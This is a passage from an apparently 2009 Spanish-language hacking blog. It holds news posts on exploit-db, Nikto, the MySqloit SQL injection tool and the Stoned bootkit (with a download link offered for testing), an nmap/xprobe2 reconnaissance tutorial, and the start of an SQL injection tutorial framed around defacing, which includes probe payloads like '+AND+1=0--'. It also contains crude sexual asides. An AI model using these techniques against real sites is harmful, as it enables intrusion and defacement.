esto les da la ventaja a los usuarios de no ser tan puro script kiddies y les alumbra la curiosidad de descargar la aplicacion y probar localmente el por que de las cosas, ventaja? el conocimiento y muchos mas tester en la jungla.

lo mismo que en milw0rm tienen la direccion de envios que es y deben tener este formato (de cabecera):

# Exploit Title: [title]
# Date: [date]
# Author: [author]
# Software Link: [downoad link if available]
# Version: [app version]
# Tested on: [relevant os]
# CVE : [if exists]
# Code : [exploit code]

al menos se ve un buen proyecto y que amplia mas el mundo de la busqueda de vulnerabilidades y de parcheo de ellas.

tambien pueden descargar el archivo de exploits completo accediendo aqui ,

en fin al menos se decidio continuar con este proyecto que de alguna manera es de vital importancia en el mundo de inseguridad/seguridad IT.

www.exploit-db.com
www.explo.it
www.offensive-security.com
www.remote-exploit.org
www.forums.remote-exploit.org

salu2

Nikto Version Nueva [2.1.0] Scanner de Vulnerabilidades

noreply@blogger.com (H4x0r Security Group) — Thu, 29 Oct 2009 06:52:00 -0700

Bueno para los que buscan nuevas opciones en cuanto a la busqueda de vulnerabilidades y les gusta usarlos en medio de consola, aca les traigo la noticia de al fin xD sale una nueva version de Nikto de la que hace tiempo no sacaban una nueva version.

en esta nueva version hacen unos nuevos cambios como el arreglo de algunos bugs que tenia la vieja por ejemplo, cuando realizabas una auditoria y el scanner se quedaba tratando de conectarse si lo usabas en modo verbose ni te devolvia un "Conection Time Out".

La re-escritura de los plugins que te da la facilidad de modificarlos y agregar nuevos.

el motor de notificaciones tambien modificable asi encontrandole mejores usos.

modificacion del cache del script permitiendo que el mismo no haga mucho ruido en los servidores auditados, y la habilidad de desabilitar las notificaciones 404 del servidor.

Habilidad de adivinar si el sistema remoto esta en un adaptador y es un dispositivo aparte y reportarlo.

Plugin para usar las listas de diccionario de OWASP Para tratar ataques de fuerza bruta en el servidor remoto.

Plugin para tratar ataques de fuerza bruta en el dominio auditado.

Permite adivinar el nombre de usuario con metodos de fuerza bruta.

Soporte para autentificacion NLTM.

Para descargarlo Version 2.1.0 .gz or .bz2 | Plugins & DBs .

Salu2

MYSQLOIT to0l de inyecciones sql para LAMP

noreply@blogger.com (H4x0r Security Group) — Sat, 12 Sep 2009 12:49:00 -0700

Como es usual leyendo en Darknet me encuentro con esta interesante herramienta Mysqloit que es una herramienta para gestion de inyecciones sql orientada a el servidor LAMP (Linux Apache MySqL y PhP) asi como WAMP (Windows Apache MySqL Y Php) tiene la gran ventaja de subir shellcodes de metasploit y ejecutarlos a traves de la inyeccion.

Asi como saben cuando van probando inyecciones los atacantes se enfrentan a muchas limitaciones o restricciones a la hora de ir probando.

Como la falta de consulta o (strings) en el comando sql que van probando y por esa razon Mysql es una plataforma de gestion de base de datos no muy seguro, la ejecucion de codigo remoto.. esta herramienta automatiza todo el proceso incluyendo consultas que podemos pasar por alto.

Las Caracteristicas de la Herramienta son:

Ejecucion de inyeccion Basado en tiempo de la misma

Huellas Digitales De La Base De Datos

Huellas Digitales del servidor web

Creacion De Payloads (tipo metasploit) y ejecucion de los mismos

==============================================

La Herramienta actualmente esta siento testeada en plataforma Linux, asi que no dudaria que la desarrollen tambien para windows,esta en su pleno desarrollo la misma.

os invito que la prueben y como recomiendan en Darknet les dejen sus opiniones al autor de la misma, asi pueden haber varias mejorias.

Descarga De La misma:
MySqloitv0.1.tar

Web Sobre Ella:
Aqui.

salu2

Stoned Bootkit Malware En El MBR de Windows Que Novedad xD

noreply@blogger.com (H4x0r Security Group) — Sun, 23 Aug 2009 09:58:00 -0700

Si asi mismo es otro malware que este puede afectar Windows xp,2003, Windows Vista, y el Segurisimo Windows 7 xD....esta vez se trata de Bootkit que es un malware similar a los rootkits,este trabaja en el inicio parchando el sistema operativo para asi poder cargarse en el "Grandioso" Kernel de windows.

Tiene muy buenas funciones de las que inclusive puede saltar la encriptacion de volumen (True Crypt) No te protegera Auditores ;) ya que el MBR (Master Boot Record) esta Fijado y no encryptado,el MBR contiene un programa de desencriptacion que este mismo contiene un password que desencripta el disco y ahi viene la vulnerabilidad y de ahi nace si Maravillosamente el mismo MBR (Master Boot Record) que puede dejar tu gran windows vulnerable una vez mas...

( No me hinchen las pelotas con sus privados sobre windows)

Si quieren fotos de mi gran verga solo pidanlas amablemente XDDDDDD

Que es lo interesante de Bootkit?:

*Vulnera los ultimos windows desde Xp Hasta Windows 7 (Ironicamente el que los amantes de windows decian que era lo mas seguron jajaja si claro)

*Para Los Auditores Que Apuestan A True Crypt Para Encriptar sus volumenes Pues Malas Noticias Ahi esta Bootkit xD

*Contiene Drivers Con Soporte NTFS y FAT ^^

*Y contiene la grandiosa opcion de plugins para desarrollo en el futuro para instalar aplicaciones (es open source ^^)

===================================================================
Para los interesados en probarlo pueden Descargarlo Aqui.
El Archivo Infector AKA.

y Leer sobre el Software Aqui En Ingles :)

Analisis De Puertos,Identificacion de sistema,servicios del mismo...

noreply@blogger.com (H4x0r Security Group) — Wed, 29 Jul 2009 20:14:00 -0700

##################
#Author: Bryant Arias
#Colaborators: Antrax
#blog: http://h4xxor.blogspot.com
#web: http://el-hacker.com
#contact: blood_rec @el-hacker.org
#Musica Durante: Dream Theater :D
#Fecha : 29 de julio 2009
##################

Importancia de El
################################
# Analisis De Puertos,Identificacion de sistema,servicios del mismo...
################################
================================
A-Introduccion:

A La hora de identificar u realizar una tarea de auditoria web en un servidor muchos cometen el error o caen en la actividad que al comenzar una tarea de auditoria siempre se van con la busqueda de las vulnerabilidades primero o a usar sus SSS (Shadow Security Scanner)...

A LA hora de identificar un sistema u realizar una auditoria podemos hacer las cosas bien a nivel de servidor/cliente,y como en el sexo debemos empezar primero poco a poco o no me van a decir que a la hora de estar con una chica llegan se lo meten y ya en tan solo 3 meses la chica lo mandara al carajo xD...

pues los sistemas son asi debemos ir poco a poco para interactuar con ellos ya que con solo identificar el sistemas scannear los puertos y servicios (Deamons) que gestiona el mismo podemos hacer cosas maravillosas sin nesesidad de utilizar otras tecnicas...

a veces se les puede tornar aburrido pero de esto se trata esto mientras mas areas vas cubriendo en el tema mucho mas acto eres para llegar a tus objetivos...solo me voy a basar en teorias y algunas practicas y pruebas que realizo en mi servidor local,donde poseo algunas aplicaciones vulnerables y no vulnerables pero podemos vulnerarlas atacando sus servicios u cosas xD...

El servidor en el cual esta todo instalado es un servidor Ubuntu 8.10 Kernel Generico Apache/2.2.9 Suhosin-Patch Server con algunas aplicaciones como joomla,smf,wordpress y otro scripts programados. el servidor obviamente esta en mi red local., la maquina auditora esta con Slackware Kernel 2.6.21.5 (Una Laptop) y a la que la e convertido en una suite de pentesting...xD

B-Comienzo:

Bueno comenzaremos con Nmap O Zenmap cualquiera de los 2.ya que los comandos son practicamente lo mismo pero nos orientaremos a la primera ya que usaremos la consola en lo personal lo prefiero ya que es un poco mas rapido y de verdad que no me gusta la GUI de la misma xD para los gusto los colores y para el culo los mojones....xD pero pueden usar la que gusten...

Nmap es un scanner de puertos y servicios hasta con el mismo puedes identificar sistemas operativos de manera remota una herrmienta imprecindible para cualquier auditor,experto en seguridad,Administrador De Red,Sistema,Servidor,Lammer,Hacker,noob,geek,hasta el user normal pero es imprecindible si a estas alturas no sabes lo que es te ivito que busques en internet u entre a la pagina del autor.:

http://www.insecure.org/nmap

Sigamos Para comenzar con un scanneo Basico veremos La manera de comenzar son comandos muy faciles de aprender de memoria pero empezemos poco a poco

Voy a Probar scaneando el servidor con las reglas del firewall excluyendo a la maquina auditora a ver que sucede?:

[ go0ns @squad # nmap 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-26 23:29 GMT
All 1715 scanned ports on 192.168.56.1 are filtered
MAC Address: 00:76:62:6E:65:74 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 49.736 seconds ]

Acabamos de ver que el firewall de esa manera nos bloqueo todos los pedidos dejandonos muchos logs en el servidor auditado:

[ Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:636 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Ldaps
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:1723 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Tacacs
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:113 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Auth
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:23 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Telnet
Time:Jul 26 17:41:41 Direction: Unknown In:wlan0 Out: Port:53 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:DNS
Time:Jul 26 17:41:42 Direction: Unknown In:wlan0 Out: Port:80 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:HTTP
Time:Jul 26 17:41:42 Direction: Unknown In:wlan0 Out: Port:80 Source:192.168.56.101 Destination:192.168.56.1 Length:44 TOS:0x00 Protocol:TCP Service:Klogin ]

UFF jajaja solo son algunos de los que puede dejar ok agregamos una regla que es lo que un servidor normal pues deberia tener ya que debe dejar la entrada de las ip's pero no en todos los caso ya que las reglas aplican a algunos puertos pero excluyen a muchos pero aprenderemos como sacar el mejor provecho posible... Ahora Vamos Y Realizamos:

[ go0ns @squad # nmap 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-26 23:28 GMT
Interesting ports on 192.168.56.1:
Not shown: 1710 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
1241/tcp open nessus
2500/tcp open rtsserv
MAC Address:Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.743 seconds
]

Ya tenemos identificado al menos lo inicial y miremos que tenemos como pudieron ver fue un scan bien basico solo los puertos /tcp como la mayoria de los scanners en la jungla esto scans son bien agresivos y siempre son agarrados por el firewall como vimos en el primer caso terminando por banear nuestra ip si el administrador tiene buenas reglas n el firewall:
#####################
#Puerto | Servicio #
#####################
#25/tcp | smpt #
#80/tcp | http #
#110/tcp | pop3 #
#1241/tcp| nessus #
#2500/tcp| rtsserv #
#####################

Bueno analizemos tenemos 5 puertos identificados de primera instancia que se gestionan bajo el protocolo /tcp si no teneis conocimiento sobre que es el protcolo /tcp u los otros protocolos similares /udp y cosas pues no continues leyendo e instruyete desde 0 mijo...

en fin con el scaneo sencillo identificamos solo esos puertos como pudieron apreciar que el log del scan nos indica tambien que se encontraron Not shown: 1710 closed ports que estan entiendase o cerrados o filtrados Huh entonces preguntaran de como es posible si es una herramienta de scaneo de puertos y servicios pero de esto se trata de poder hacer las identificaciones especificas..

ahora queremos saber que sistema operativo tiene siempre como root asumiendo que estais en linux (igual puede hacerlo desde el otro sistema operativo) xD ok, pues realizamos

[ go0ns @squad # nmap -O 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-26 23:32 GMT
Interesting ports on 192.168.56.1:
Not shown: 1710 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
1241/tcp open nessus
2500/tcp open rtsserv
MAC Address: (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.60%D=6/26%OT=25%CT=1%CU=33422%PV=Y%DS=1%G=Y%M=007662%TM=4A455AA
OS:F%P=i686-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CC%TI=Z%II=I%TS=U)SEQ(SP=CD%GC
OS:D=1%ISR=CD%TI=Z%II=I%TS=U)OPS(O1=M5B4%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6
OS:=M5B4)WIN(W1=16D0%W2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T
OS:=40%W=16D0%O=M5B4%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)
OS:T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=N)U1(R=Y%DF=N%T=40%TOS=C0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUL
OS:=G%RUD=G)IE(R=Y%DFI=N%T=40%TOSI=S%CD=S%SI=S%DLI=S)

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.029 seconds
]

Bueno pudieron apreciar que nmap reacciono casi de la misma manera que con el 2do intento con un scaneo de puertos sencillo en los protocolos /tcp pero en este caso usamos el argumento -O para scanear el posible sistema operativo, como funciona? nmap envia cadenas especializadas a dos puertos especificos uno cerrado y uno abierto, estolo hace con el proposito de que cada sistema operativo reacciona de manera diferente a estas peticiones y como pudieron ver el scanner tubo problemas descubriendo el server que como mencione antes era ubuntu 8.10 pero igual vean los primeros resultados que se acercan a lo que queremos:

[ OS:F%P=i686-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CC%TI=Z%II=I%TS=U)SEQ(SP=CD%GC ]

Los comandos basicos de nmap los pueden ir encontrando poco a poco que tal si cambiamos un poco los comandos para que vallan haciendose una idea y familiarizandose con dicho programa y la manera que tenemos como siempre de llagar a nuestro objetivo en este caso usaremos un scaneo intensivo pero rapido que se supone que nos arroje los resultados mas imprecindibles..

[go0ns @squad # nmap -T Aggressive -A -v 192.168.56.1

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-27 01:43 GMT
Initiating ARP Ping Scan at 01:43
Scanning 192.168.56.1 [1 port]
Completed ARP Ping Scan at 01:43, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:43
Completed Parallel DNS resolution of 1 host. at 01:43, 13.00s elapsed
Initiating SYN Stealth Scan at 01:43
Scanning 192.168.56.1 [1715 ports]
Discovered open port 25/tcp on 192.168.56.1
Discovered open port 80/tcp on 192.168.56.1
Discovered open port 110/tcp on 192.168.56.1
Discovered open port 2500/tcp on 192.168.56.1
Discovered open port 1241/tcp on 192.168.56.1
Completed SYN Stealth Scan at 01:43, 0.55s elapsed (1715 total ports)
Initiating Service scan at 01:43
Scanning 5 services on 192.168.56.1
Completed Service scan at 01:43, 11.47s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.1
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 01:43
Completed SCRIPT ENGINE at 01:43, 5.05s elapsed
Host 192.168.56.1 appears to be up ... good.
Interesting ports on 192.168.56.1:
Not shown: 1710 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_ SMTP: HELP with errors or timeout. Enable --script-trace to see what is happening.
80/tcp open http Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch)
|_ HTML title: Index of /
110/tcp open pop3 hotwayd pop3d 0.8.4
1241/tcp open ssl/unknown
2500/tcp open smtp-proxy hotsmtpd based on hotwayd 0.8.4
MAC Address: (Unknown)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.23
Uptime: 0.089 days (since Fri Jun 26 23:35:55 2009)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: go0ns.s3rver

Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.036 seconds
Raw packets sent: 1735 (77.100KB) | Rcvd: 1731 (80.266KB) ]

Uff que lectura mas larga pero vamos a ver que datos contiene que nos pueden ayudar y ya se habran dado de cuenta de la gran diferencia con los resultados y el cambio de Parametros.

Veamos primero el scan y estas opciones para ver lo que relativamente es importante antes de probar este de ahora tratamos de identificar el sistema operativo lo que realizo fue adivinar el sistema operativo pero esta vez logramos de dar con el mismo mas especificamente y dar con los servicios que gestiona el mismo como los deamons miremos:

[ PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_ SMTP: HELP with errors or timeout. Enable --script-trace to see what is happening.
80/tcp open http Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch)
|_ HTML title: Index of /
110/tcp open pop3 hotwayd pop3d 0.8.4
1241/tcp open ssl/unknown
2500/tcp open smtp-proxy hotsmtpd based on hotwayd 0.8.4 ]

Como podemos ver identifica nuevamente los puertos ya mencionados asi como los servicios y la version y magicamente identifica el sistema operativo que gestiona el server :

[ Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch ]

Sonrisa y la otra parte relativamente importante es que identifica la version de los servicios aunque esto no es tan fundamental por que puede que sea un falso asi como uno correcto pero aqui es que llega la intuicion del auditor de usar la logica ya que puedes ir teoricamente buscando cual es la version real de dicho servicio con la identificacion del sistema operativo.

y que resume esto? que podemos darnos con el escenario que la aplicacion web no es vulnerable pero si los servicios o deamons del mismo y podemos vulnerarla por ahi xD ELEMENTAL NO?

por eso es que es bien importante los scaneos de identificacion por que de muchas maneras puedes encontrar las vulnerabilidades si no lo son a nivel web son a nivel server pero siempre encontraras algo.Sigamos

[ OS details: Linux 2.6.13 - 2.6.23 ]

Nos indica mas o menos el kernel que corre bajo el sistema operativo pero no siempre se da este caso del mismo las mayoria de las veces lo atina..

otra de las herramientas que podemos encontrar por la jungla de la web es xprobe2 para la identificacion de sistemas operativos veamos:

[ go0ns.squad # xprobe2 -v 192.168.56.1

* Primary guess:
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.22" (Guess probability: 100%)
* Other guesses:
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.23" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.21" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.20" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.19" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.24" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.25" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.26" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.27" (Guess probability: 100%)
* Host 192.168.56.1 Running OS: "Linux Kernel 2.4.28" (Guess probability: 100%)
* Cleaning up scan engine
* Modules deinitialized
* Execution completed ]

casi igual como nmap lo unico que este tiene tareas mas especificas en la identificacion de sistemas operativos y nos arroja el mismo resultado que muchas veces pued confundir pero a medida que vallan perfeccionando las tecnicas dan con los mismos.

Otra herramienta que nos puede ayudar en la identificacion de sistemas y objetivos de la informacion del mismo es Maltego que se puede descargar desde Paterva.com con la que pueden sacar emails,directorios,archivos,dominios,sub dominios y otras cosas del servidor identificado.

entonces que es lo que quiero adentrar y detallar mas aqui solo queria explicarles que para identificar vulnerabilidades en un servidor no tienes primero que comenzar por la aplicacion web nesesariamente con tan solo con la identificacion misma del sistema puedes abrir muchas posibilidades a descubrir muchas mas cosas que solo las vulnerabilidades que tiene la web o el servidor...

si ya saben que pueden encontrar una aplicacion web en un servidor que no sea vulnerable que buscas por lados y no encuentras nadas pero se te olvido buscar los servicios que tiene el server pero cuando scaneas encuentras que tiene varios deamons que son vulnerables como el mencionado arriba que gestiona el correo postfix donde corre el servicio smpt y supongamos que ese servicio contiene un deamon que sea vulnerable a un buffer overflow o (desbordamiento) como quieran decirle entonces BINGO !!! haz encontrado algo al menos en mi servidor local solo hay muy ocos servicios gestionandose.

pero siempre alla fuera en la jungla encontrarn muchicimo mas como servicios de mysql,mssql,u otras cosas interesantes..

entonces siempre recuerden que la identificacion de sistemas es lo primero que debemos hacer a la hora de buscar vulnerabilidades en una web por que puedes llegar a encontrar puertas abiertas sin tener que registrar la aplicacion web y no te imaginas las posibilidades que hay dentro del mismo..

si si te preguntas SE PUEDE USAR NMAP PARA BUSCAR VULNERABILIDADES? no y si por que no te identificara las vulnes de primera instancia pero realiza algunas cadenas de reglas como metodos de scan que te audarian a identificar servicios sin actualizacion vulnerables a algunos ataques..

espero que esta breve explicacion sobre la importancia de la identificacion y puertos de un sistema les haya gustado ya Breve Pasamos al proximo Paper y Aqui les dejo una listita de algunas herramientas que te ayudarian en este renglon:
nmap
Zenmap
Amap
Maltego
httprint
unicornscan
xprobe

son herramientas con usos similares pero les pueden acomodar tareas especificas para sacarle provecho...

Greetz: JosS,alevsk,ANTRAX,h4n0wars,e-r00t.org,security-shell members,Darvein,y mis hijos por crecer tan rapido carajo xD..

###########
#blood_rec#
###########

para leer el papel mas completo:
Link
Link

Cubriendo Y Aplicando Teorias De Inyecion Sql

noreply@blogger.com (H4x0r Security Group) — Wed, 29 Jul 2009 19:38:00 -0700

###################################
#Author: Bryant Arias #
#Colaborators: Antrax #
#blog: http://h4xxor.blogspot.com #
#web: http://underc0de.org #
#contact: blood_rec@el-hacker.org #
###################################

##################################
# Cubriendo Y Aplicando Teorias De Inyecion Sql
##################################
==================================
A-Introduccion:

Este Paper pretende cubrir 2 areas Teoria Y Practica si no te gusta leer mucho simplemente Erase (borra) el paper con este paper pretendemos cubrir todo lo referente recopilando info y con los conocimientos limitados que tenemos queremos simplemente dar una guia referente al tema es como el Paper de "Defacing De La Manera Correcta" pero esta vez con practicas y lectura para entretener al usuario que quiere adentrarse en el tema del defacing.

es imprecindible que no traten de saltar ninguna area ya que pretendemos cubrir lo mas extenso posible para que tenga un buen enfasis de lo que realizan y el escenario que enfrentaremos alla afuera en la web

ya e escribido varias veces sobre las vulnerabilidades webs y ciertamente cada vez que pasan los dias la tecnologia y la web se va moviendo a pasos Agigantados hasta el punto que se a vuelto en el medio publicitario mas grande de estos dias.

pero a medida que nos movemos muchos quieren convertirse en desarrolladores de aplicaciones asi como webmasters u administradores de servidores webs,la competencia es amplia y asi como es amplia las vulnerabilidades aumentan asi como las viejas (vulnerabilidades) siguen haciendo presencia en nuestros scripts (me incluyo) por que estamos sujetos a cometer errores con nuestras aplicaciones.

ya los que me conocen saben que soy bien teorico en este tema y me gusta abarcar el medio Pero Por que lo hago? el conocimiento del hombre esta bajo unas letras y mientras mas entendamos el tema podemos aplicar todo lo que se explica dentro de el.

En este paper estaremos cubriendo las areas mencionadas en el menu arriba y asumimos que la practica la llevaras a cabo en tu servidor local L.A.M.P <> W.A.M.P, sea el escenario en una red LAN de tu propiedad o el escenario ya mencionado pero asumimos que todo es con motivo educacional y proponiendo los problemas ya mencionados en el tema.

asumimos que si estas leyendo este paper tienes conocimientos basicos de php si no es asi puedes pasar por http://php.net y ahi podras encontrar mucha info al respecto, asi como puedes encontrar informacion en http://google.com = search - php manuales xD. y pases por el buscador a buscar referencias sobre lo que no entiendan asi como los otros lenguajes al menos conocimientos basicos como en perl,html,javascript etc pero al menos lo basico...

Segun Wikipedia:
SQL Injection es una vulnerabilidad en el nivel de la validación de las entradas a la base de datos de una aplicación. Una inyección SQL sucede cuando se inserta o “inyecta” un código SQL “invasor” dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el
código “invasor en la base de datos.

bueno a lo que vivnimos...
#####################################
B-Inyecciones SQL (SQL Injections):

Primero asumo que llegastes a este manual por que quieres aprender como se realiza este ataque y muchas veces debes haber leido esta explicacion pero muchos que empieza este tema pues aun no se enteran de que se trata esto y que significa pues como lectura obligatoria pongo su significado.

Inyeccion Sql Es cuando un comando SQL que es un lenguaje de gestion de datos es ejecutado con las intenciones de obtener data de una base de datos,en palabras mas tecnicas estamos haciendo una consulta arbitraria de un comando peviamente establecido., y de esa manera manipulamos la aplicacion que queremos.

No es algo muy avanzado ni muy nuevo en nuestro mundo under y realmente se pregunta constantemente pero que herramientas debo usar para hacer inyecciones sql's ?

realmente no nesesitas muchas tools con solo firefox bastara xD http://mozzila.org/firefox ,...

explotar validaciones de aplicaciones que se gestiones por base de datos mysql son el escenario que realmente perseguimos o un ejemplo de probar dicha vulnerabilidad,...

Obviamente no puedo llenarlos de letras explicando todo esto todo el dia por que igual me criticarian y a mi me facina escribir pero en fin vallamos mas adelante:

1-Detectando La Vulnerabilidad:
Bueno lo primero que nesesitaremos es obviamente la curiosidad y la malicia pongamos el escenario asi; entramos en una pagina dinamica en php y nos pide una autentificacion., obviamente no la tenemos y tendremos que registrarnos interactuando con una forma en php que asi mismo ella interactua con una base de datos para incluir el usuario.

ok para saber como interactuan ambas sabmos que cuando registras un usuario en una forma y queda registrado en la base de datos quedan guardados en una tabla o en muchas de ellas seria en la tabla de miembros y el usuario asi como el password quedan guardados en diferentes columnas., detente si no tienes idea de esto es hora que te pases por http://wikipedia.org/SQL .

Cuanod te logeas en la forma la aplicacion busca la DATA del usuario en la tabla del usuario que proporcionastes asi como el password, asi la aplicacion despues de encontrar el usuario y contrasena que suplistes te dejara logearte en dicha aplicacion., si se diera el caso que los datos son icorrectos pues la aplicacion te lo informara que los datos son icorrectos o el usuario que proporcionaste no existe etc., ya a de haberle pasado alguna vez..

SQL puede darte estos datos en pantalla tambien y mostrar la informacion dentro de una palicacion web., eso en el ejemplo de las formas de logeo asi como si la aplicacion tiene una seccion de posteo de links pues tendra una tabla en la base de datos que guarda y gestiona los links publicados, lo mismo para noticias, una tabla que guardara los nombres de las noticias, en este caso la mayoria de las veces estas noticias u cosas,artculos se identifican la mayoria de las veces en las tablas por un numero.

como nos damos de cuenta cual es ese numero si miramos la url del sitio que estamos probando dira o sera asi

---> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=69 ]

la url le dice al sitio ue mire la tabla que tiene el nombre del articulo que es :

[ ArticuloID que es "69" ]

Una vez que el sitio busca la tabla del "ArticuloID" que se Busca la misma linea que se llama "Titulo" Dentro de la columna y la muestra en tu navegador.

En este otro caso veremos "lammer" como titulo de nuestro Articulo, recuerden que es bien importante ver que esta escrito despues de '=' que es parte de un comando SQL siempre tengamos eso en mente:
####################
#Articulo_Id#Titulo#
#===========#======#
#69 #lammer#
#70 #kiddie#
#71 #noob #
####################

OK y entonces que es lo que debemos hacer ya que tenemos nuestra victima? ok ejecutaremos comandos manualmente a ver si nuestra aplicacion es vulnerable,realizando nuestras consultas via navegador (firefox) xD, ejecutaremos ese comando siempre despues de '=' si es el caso que queremos inyectar en la forma que nos muestra los articulos,etc., si es el caso que es una forma de autentificacion sease usuario + password pues los comandos los ejecutaremos en los campos mencionados. como una barra de busqueda una barra de usuario o password.

si es vulnerable siempre el sitio hara lo que le digas que haga solo manipulando las consultas SQL xD

Es muy importante siempre leer y aprender sobre lo que estas haciendo aprender los comandos y todo aplicarlo a full ya que de esa manera la practica te hara un maestro. Memorizarte poco a poco te hara bien y entonces nos familiarizamos con algunos comandos SQL:

#######################
Comando ## Uso #
=======================
ORDER BY Le Ordena Al sitio que nos muestre la columna en la misma pagina que estamos visualizando#
OR El Comando se usa si una sentencia es verdadera dentro de la consulta SQL #
+ Se Usa En Vez De Usar Espacio Lease,Entiendase la tecla de Espacio [Space] #
-- Termina Una sentencia de comandos SQL asi como lasm ';' en perl etc #
AND Ambas consultas tienen que ser verdaderas dentro de la base de datos Para ser llevada #
UPDATE Cambia la informacion dentro de una Columna O Una Tabla #
SELECT Especifica Informacion En una Tabla #
##################################

La manera mas sencilla de aplicar una inyeccion sql,es burlando autentificaciones,que son nada mas o menos que las autentificaciones de usuario y password:

pero en este caso probaremos con una consulta bien elemental dentro del mundo de las inyecciones sql y es con tan simple el uso de (') comilla , sabemos que en la forma el usuario y el password esta rodeado de comillas simples "'" entonces si sometemos a la forma una simple comilla te arrojara un error dado que hay 2 "'" (comillas) invisbles en la forma si sometemos a' te arrojara el error comun cuando hay un error de consulta SQL en el servidor obviamente nos daremos cuenta pero que realmente esta pasando detras de nostros ?:

cuando sometimos ' el servidor envio una consulta a la base de datos para interpretar ' que en los campos mencionados arriba estan rodeados de ellas 'usuario' seria el ejemplo al servidor no encontrar nada en la base de datos que consulte ese comando ni en las tablas ni en las lineas ni en las columnas por ende es un error del programador (entiendase) una vulnerabilidad aunque no en todos los casos.

siempre dentro de una base de datos tenemos el INFORMATION_SCHEMA que guarda cada nombre de las tablas y de las columnas de un sitio en siempre un servidor tendra el INFORMATION_SCHEMA como dato obvio su nombre nunca cambiara las tablas dentro de INFORMATION_SCHEMA que guarda los nombres de las otras tablas tendran una tabla dentro que se llamara INFORMATION_SCHEMA.TABLES el nombre de la columna que guarda la informacion que practicamente queremos se llama a su vez table_name la tabla que guarda el nombre de las otras columnas dentro de INFORMATION_SCHEMA se llama INFORMATION_SCHEMA.COLUMNS y sucesivamente la columna que guarda la informacion que queremos de esta parte se llama column_name recuerden que esto es dentro de INFORMATION_SCHEMA.COLUMNS., ya se les esta haciendo claro no?. xD

como explique antes podemos siempre encontrar la caracteristica que el sitio web que gestiona la base de datos siempre tiene "=" en su URL por ende que para ejecutar los comandos tenemos que hacerlo luego de "=" ok simplemente prueba con los comandos o consultas despues de...

ok vamos a nuestro escenario imaginario:

estamos navegando y nos encontramos nuevamente con la web:

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10 ]

ok vamos a determinar si es vulnerable

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10+AND+1=0-- ]

